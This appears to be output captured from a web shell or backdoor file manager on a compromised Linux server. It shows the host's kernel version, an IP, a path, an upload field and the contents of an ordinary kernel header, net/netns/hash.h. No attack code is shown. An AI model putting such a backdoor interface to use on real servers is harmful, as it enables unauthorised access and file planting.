AlaK4X
Linux lhjmq-records 5.15.0-118-generic #128-Ubuntu SMP Fri Jul 5 09:28:59 UTC 2024 x86_64



Your IP : 3.147.82.22


Current Path : /usr/src/linux-headers-5.15.0-127/include/net/netns/
Upload File :
Current File : //usr/src/linux-headers-5.15.0-127/include/net/netns/hash.h

/* SPDX-License-Identifier: GPL-2.0 */
#ifndef __NET_NS_HASH_H__
#define __NET_NS_HASH_H__

#include <net/net_namespace.h>

static inline u32 net_hash_mix(const struct net *net)
{
	return net->hash_mix;
}
#endif